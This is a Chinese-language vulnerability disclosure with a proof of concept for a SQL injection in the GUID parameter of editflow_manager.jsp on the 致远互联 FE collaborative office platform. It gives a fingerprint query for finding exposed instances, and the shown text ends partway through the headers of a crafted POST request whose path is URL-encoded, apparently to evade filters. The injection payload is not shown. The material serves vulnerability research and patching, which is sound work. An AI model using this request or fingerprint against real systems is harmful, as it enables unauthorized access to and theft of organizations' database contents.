产品简介
致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。平台旨在为企业提供数字化转型和升级的解决方案,特别是针对大中型政府和企业客户。平台的主要特点包括开放共享、多种协同应用、以及先进的技术支持。
漏洞概述
致远互联FE协作办公平台editflow_manager.jsp存在sql注入漏洞,由于GUID参数未过滤或者过滤不严格,允许攻击者利用漏洞获取数据库敏感。
指纹识别
app="致远互联-FE"
漏洞复现
POC
POST /sysform/003/editflow_manager.j%73p HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding